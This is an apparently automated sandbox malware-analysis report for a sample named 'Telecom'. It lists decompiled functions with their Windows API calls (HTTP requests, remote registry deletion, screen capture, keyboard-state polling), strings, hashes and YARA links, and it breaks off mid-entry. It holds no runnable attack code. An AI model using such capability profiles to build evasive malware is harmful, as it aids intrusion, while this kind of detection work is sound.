Instruction Fuzzy Hash: 3F616B31501711EFEB39AF18DA48B6A77B1FF90316F10852BE04296670C778ACD5DB49

Uniqueness

Uniqueness Score: -1.00%

Function 004BCEBB Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004BCEF5
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 004BCF08
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 004BCF1C
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004BCF35
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 004BCF78
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 004BCF8E
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004BCF99
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 004BCFC9
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 004BD021
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 004BD035
InternetCloseHandle.WININET(00000000), ref: 004BD040

Strings

, xrefs: 004BCFBA

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 964efd3b313902d44c9832acddb09f277929b6a74aba7441fee2b4ef5f18fb8e
Instruction ID: d9ccf9ea4e5f3c493f87fad7b21cc8b00672ad9fbdab550bd4eac671aeacb594
Opcode Fuzzy Hash: 964efd3b313902d44c9832acddb09f277929b6a74aba7441fee2b4ef5f18fb8e
Instruction Fuzzy Hash: B25179B1901608BFDB219F61CC88AEB7BBCFF08748F00446BF94586250E738D945AB79

Uniqueness

Uniqueness Score: -1.00%

Function 004D8FCB Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,004D66D6,?,?), ref: 004D8FEE
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,004D66D6,?,?,00000000,?), ref: 004D8FFE
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,004D66D6,?,?,00000000,?), ref: 004D9009
CloseHandle.KERNEL32(00000000,?,?,?,?,004D66D6,?,?,00000000,?), ref: 004D9016
GlobalLock.KERNEL32(00000000,?,?,?,?,004D66D6,?,?,00000000,?), ref: 004D9024
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,004D66D6,?,?,00000000,?), ref: 004D9033
GlobalUnlock.KERNEL32(00000000,?,?,?,?,004D66D6,?,?,00000000,?), ref: 004D903C
CloseHandle.KERNEL32(00000000,?,?,?,?,004D66D6,?,?,00000000,?), ref: 004D9043
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,004D66D6,?,?,00000000,?), ref: 004D9054
OleLoadPicture.OLEAUT32(?,00000000,00000000,004E0C04,?), ref: 004D906D
GlobalFree.KERNEL32(00000000), ref: 004D907D
GetObjectW.GDI32(00000000,00000018,?), ref: 004D909D
CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 004D90CD
DeleteObject.GDI32(00000000), ref: 004D90F5
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004D910B

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: c0967022f2c243f7dd12e5a45f11e3c4e26bedb7d3c4fa5b95a956173400c097
Instruction ID: 7d8d2d6870eb7091aa5d4b819519358d26b57545588e57559812855d71d84de5
Opcode Fuzzy Hash: c0967022f2c243f7dd12e5a45f11e3c4e26bedb7d3c4fa5b95a956173400c097
Instruction Fuzzy Hash: 3D413771A01208AFDB119F65DC88EAB7BB8EF89711F10806AF906E7260D7349D41CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004CC06E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0044B329: _wcslen.LIBCMT ref: 0044B333

Part of subcall function 004CD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004CC10E,?,?), ref: 004CD415
Part of subcall function 004CD3F8: _wcslen.LIBCMT ref: 004CD451
Part of subcall function 004CD3F8: _wcslen.LIBCMT ref: 004CD4C8
Part of subcall function 004CD3F8: _wcslen.LIBCMT ref: 004CD4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004CC154
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004CC1D2
RegDeleteValueW.ADVAPI32(?,?), ref: 004CC26A
RegCloseKey.ADVAPI32(?), ref: 004CC2DE
RegCloseKey.ADVAPI32(?), ref: 004CC2FC
LoadLibraryA.KERNEL32(advapi32.dll), ref: 004CC352
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 004CC364
RegDeleteKeyW.ADVAPI32(?,?), ref: 004CC382
FreeLibrary.KERNEL32(00000000), ref: 004CC3E3
RegCloseKey.ADVAPI32(00000000), ref: 004CC3F4

Strings

advapi32.dll, xrefs: 004CC34D
RegDeleteKeyExW, xrefs: 004CC35E

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: 5118a8cfb1e0426995393b3976111193587d70a87071c7558ee93fde3b06c87e
Instruction ID: 29f534a8c8430b930f729ea3d6b14e82664e815c994afdf7415572c1319a25ff
Opcode Fuzzy Hash: 5118a8cfb1e0426995393b3976111193587d70a87071c7558ee93fde3b06c87e
Instruction Fuzzy Hash: 95C16C34604241AFD750DF15C494F2ABBE1FF84308F58849EE85A8B3A2CB79EC46CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004DA94F Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 271windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0044249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004424B0

GetSystemMetrics.USER32(0000000F), ref: 004DA990
GetSystemMetrics.USER32(00000011), ref: 004DA9A7
GetSystemMetrics.USER32(00000004), ref: 004DA9B3
GetSystemMetrics.USER32(0000000F), ref: 004DA9C9
MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 004DAC15
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 004DAC33
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 004DAC54
ShowWindow.USER32(00000003,00000000), ref: 004DAC73
InvalidateRect.USER32(?,00000000,00000001), ref: 004DAC95
DefDlgProcW.USER32(?,00000005,?), ref: 004DACBB

Strings

@, xrefs: 004DABD0
(Q, xrefs: 004DA95B

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
String ID: @$(Q
API String ID: 3962739598-645415278
Opcode ID: 9a57ef51b9b4f6ae30189eecf5f696241f1036ad316ed9e7c74e1fb5c956f3f4
Instruction ID: ab576b33566b9e2c403dff7528dc4fe88f669dd6e2fc2ba1bf1933d56d93e1ac
Opcode Fuzzy Hash: 9a57ef51b9b4f6ae30189eecf5f696241f1036ad316ed9e7c74e1fb5c956f3f4
Instruction Fuzzy Hash: A9B18930600219EFDF14CF68C9947AE7BB2FF44710F18806BED449A395D778A9A0CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 004C2FB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 004C3035
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004C3045
CreateCompatibleDC.GDI32(?), ref: 004C3051
SelectObject.GDI32(00000000,?), ref: 004C305E
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 004C30CA
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 004C3109
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 004C312D
SelectObject.GDI32(?,?), ref: 004C3135
DeleteObject.GDI32(?), ref: 004C313E
DeleteDC.GDI32(?), ref: 004C3145
ReleaseDC.USER32(00000000,?), ref: 004C3150

Strings

(, xrefs: 004C30EA

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 33bf480f206177617a6897614c3d87f7f2336f8280c3839b456ad265b24de46d
Instruction ID: e00dd8a31352fb71dcdc21f46d2b76f20d1d07d08283ca857fa6ce34831d9b5f
Opcode Fuzzy Hash: 33bf480f206177617a6897614c3d87f7f2336f8280c3839b456ad265b24de46d
Instruction Fuzzy Hash: B561F275D01219AFCB04CFA5D884EAEBBF5FF48310F20842EE555A7210D775A941CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004A52AA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 004A52E6
GetWindowTextW.USER32(?,?,00000400), ref: 004A5328
_wcslen.LIBCMT ref: 004A5339
CharUpperBuffW.USER32(?,00000000), ref: 004A5345
_wcsstr.LIBVCRUNTIME ref: 004A537A
GetClassNameW.USER32(00000018,?,00000400), ref: 004A53B2
GetWindowTextW.USER32(?,?,00000400), ref: 004A53EB
GetClassNameW.USER32(00000018,?,00000400), ref: 004A5445
GetClassNameW.USER32(?,?,00000400), ref: 004A5477
GetWindowRect.USER32(?,?), ref: 004A54EF

Strings

ThumbnailClass, xrefs: 004A53BD, 004A5450

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: 497b13c68e86f07155dc5e5098594a0e120062626826a762cce7bc4a619dd254
Instruction ID: 4d4101a05b6aa60119868ce20f9138930dae5dc63443a0617487512b30ab4856
Opcode Fuzzy Hash: 497b13c68e86f07155dc5e5098594a0e120062626826a762cce7bc4a619dd254
Instruction Fuzzy Hash: 1A912771504B06BFDB04CF24CA94BAAB7A9FF66304F00452FFA4682180EB39ED55CB85

Uniqueness

Uniqueness Score: -1.00%

Function 004AC8F7 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(005129C0,000000FF,00000000,00000030), ref: 004AC973
SetMenuItemInfoW.USER32(005129C0,00000004,00000000,00000030), ref: 004AC9A8
Sleep.KERNEL32(000001F4), ref: 004AC9BA
GetMenuItemCount.USER32(?), ref: 004ACA00
GetMenuItemID.USER32(?,00000000), ref: 004ACA1D
GetMenuItemID.USER32(?,-00000001), ref: 004ACA49
GetMenuItemID.USER32(?,?), ref: 004ACA90
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 004ACAD6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004ACAEB
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004ACB0C

Strings

0, xrefs: 004AC904

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep
String ID: 0
API String ID: 1460738036-4108050209
Opcode ID: 189a3900c9c0b58e0e57e1600cf0f45d0345016b0150c3d943afaee298a8d0f8
Instruction ID: 6fff1d2074233d45443f3dd6ec490d49fa468c930381070ed14eeeb3c6b0a74f
Opcode Fuzzy Hash: 189a3900c9c0b58e0e57e1600cf0f45d0345016b0150c3d943afaee298a8d0f8
Instruction Fuzzy Hash: 2461BEB0901209AFDF51CF68DDC8AFF7BA8FB16348F04401AE812A3251D739AD05CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004AE4C2 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 004AE4D4
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 004AE4FA
_wcslen.LIBCMT ref: 004AE504
_wcsstr.LIBVCRUNTIME ref: 004AE554
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 004AE570

Strings

StringFileInfo\, xrefs: 004AE543
\VarFileInfo\Translation, xrefs: 004AE568
%u.%u.%u.%u, xrefs: 004AE64E
04090000, xrefs: 004AE5A6
DefaultLangCodepage, xrefs: 004AE5D3

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: 4d7f55a4c867b5846723ee6c15f7a618f713f6de53edacc8e413f5e5414c8d7d
Instruction ID: ebe214f169b16676f3032c3bbb676dc7aa68fefc5e504f80a30e2eef3d86e5bf
Opcode Fuzzy Hash: 4d7f55a4c867b5846723ee6c15f7a618f713f6de53edacc8e413f5e5414c8d7d
Instruction Fuzzy Hash: C041FA729402047AEB10AB66DC47EBF776CDF66714F10046BF901A6182FB7D9A0192AE

Uniqueness

Uniqueness Score: -1.00%

Function 004AEFC7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 004AEFCB

Part of subcall function 0045F215: timeGetTime.WINMM(?,?,004AEFEB), ref: 0045F219

Sleep.KERNEL32(0000000A), ref: 004AEFF8
EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 004AF01C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 004AF03E
SetActiveWindow.USER32 ref: 004AF05D
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 004AF06B
SendMessageW.USER32(00000010,00000000,00000000), ref: 004AF08A
Sleep.KERNEL32(000000FA), ref: 004AF095
IsWindow.USER32 ref: 004AF0A1
EndDialog.USER32(00000000), ref: 004AF0B2

Strings

BUTTON, xrefs: 004AF030

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: c7578466c65bb36f67615f97fb096bad48659c9aba032ec323db715018a4356d
Instruction ID: 61bc9a658e8e6c28135ef81e7b25499d02bd33acf7ab4d6629d14ccd91a2ab97
Opcode Fuzzy Hash: c7578466c65bb36f67615f97fb096bad48659c9aba032ec323db715018a4356d
Instruction Fuzzy Hash: F921A471A05204BFE7116F60EC99B677B69F77A749F00403BF50282372CB799C089669

Uniqueness

Uniqueness Score: -1.00%

Function 004AF313 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 0044B329: _wcslen.LIBCMT ref: 0044B333

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 004AF374
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 004AF38A
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004AF39B
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 004AF3AD
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 004AF3BE

Strings

play PlayMe wait, xrefs: 004AF3A8
open , xrefs: 004AF323
play PlayMe, xrefs: 004AF3B9
status PlayMe mode, xrefs: 004AF36F
alias PlayMe, xrefs: 004AF34D
close PlayMe, xrefs: 004AF385, 004AF3B2

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 77c20ba46cb9725ddc01c8f358dd30e5671d2e21c97ef3bc9048ecf1e9635a60
Instruction ID: 3d8b8692e17c78360503894fd3aa6675d78424baf156f5228092a20455a53962
Opcode Fuzzy Hash: 77c20ba46cb9725ddc01c8f358dd30e5671d2e21c97ef3bc9048ecf1e9635a60
Instruction Fuzzy Hash: F811A771E9015D79E710A7A68C4AEFF6E7CEFE6B04F40082B7801E20D1DA646909C6B5

Uniqueness

Uniqueness Score: -1.00%

Function 00472FF3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00473007

Part of subcall function 00472D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0047DB51,00511DC4,00000000,00511DC4,00000000,?,0047DB78,00511DC4,00000007,00511DC4,?,0047DF75,00511DC4), ref: 00472D4E
Part of subcall function 00472D38: GetLastError.KERNEL32(00511DC4,?,0047DB51,00511DC4,00000000,00511DC4,00000000,?,0047DB78,00511DC4,00000007,00511DC4,?,0047DF75,00511DC4,00511DC4), ref: 00472D60

_free.LIBCMT ref: 00473013
_free.LIBCMT ref: 0047301E
_free.LIBCMT ref: 00473029
_free.LIBCMT ref: 00473034
_free.LIBCMT ref: 0047303F
_free.LIBCMT ref: 0047304A
_free.LIBCMT ref: 00473055
_free.LIBCMT ref: 00473060
_free.LIBCMT ref: 0047306E

Strings

&N, xrefs: 00472FFE

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: &N
API String ID: 776569668-3062594351
Opcode ID: 01851801879984a5208ba90a59370964ad75af7871390c93ba5371f79c20bffc
Instruction ID: c858d2efe409836f9baa71d1c94733aca348bc8ddee37c227deeeb17c99da276
Opcode Fuzzy Hash: 01851801879984a5208ba90a59370964ad75af7871390c93ba5371f79c20bffc
Instruction Fuzzy Hash: 3011E976100008FFCB11EF56CA42CDE3B65EF05354F8184AAFA0C9F222D679DE519B54

Uniqueness

Uniqueness Score: -1.00%

Function 004AA958 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 004AA9D9
SetKeyboardState.USER32(?), ref: 004AAA44
GetAsyncKeyState.USER32(000000A0), ref: 004AAA64
GetKeyState.USER32(000000A0), ref: 004AAA7B
GetAsyncKeyState.USER32(000000A1), ref: 004AAAAA
GetKeyState.USER32(000000A1), ref: 004AAABB
GetAsyncKeyState.USER32(00000011), ref: 004AAAE7
GetKeyState.USER32(00000011), ref: 004AAAF5
GetAsyncKeyState.USER32(00000012), ref: 004AAB1E
GetKeyState.USER32(00000012), ref: 004AAB2C
GetAsyncKeyState.USER32(0000005B), ref: 004AAB55
GetKeyState.USER32(0000005B), ref: 004AAB63

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: ec4013cbd3df7f28ccf2cd340b5b97752f8c9adb28046d1b51cba9a5dadb5e49
Instruction ID: 7d8bd4e41fd5bee9857107e77d2771647ca9f866ce4389af6f1a70613155dbf3
Opcode Fuzzy Hash: ec4013cbd3df7f28ccf2cd340b5b97752f8c9adb28046d1b51cba9a5dadb5e49
Instruction Fuzzy Hash: 1B51B860A0478429FB35DB608954BABAFF59F23344F08459FC5C2572C2DB58AB4CC7AB

Uniqueness

Uniqueness Score: -1.00%

Function 004A662D Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 004A6649
GetWindowRect.USER32(00000000,?), ref: 004A6662
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 004A66C0
GetDlgItem.USER32(?,00000002), ref: 004A66D0
GetWindowRect.USER32(00000000,?), ref: 004A66E2
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 004A6736
GetDlgItem.USER32(?,000003E9), ref: 004A6744
GetWindowRect.USER32(00000000,?), ref: 004A6756
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 004A6798
GetDlgItem.USER32(?,000003EA), ref: 004A67AB
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 004A67C1
InvalidateRect.USER32(?,00000000,00000001), ref: 004A67CE

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 71d11d19173092f8a886256f7c5f7d04793772a47dd2ced75e1fcc9423b386d0
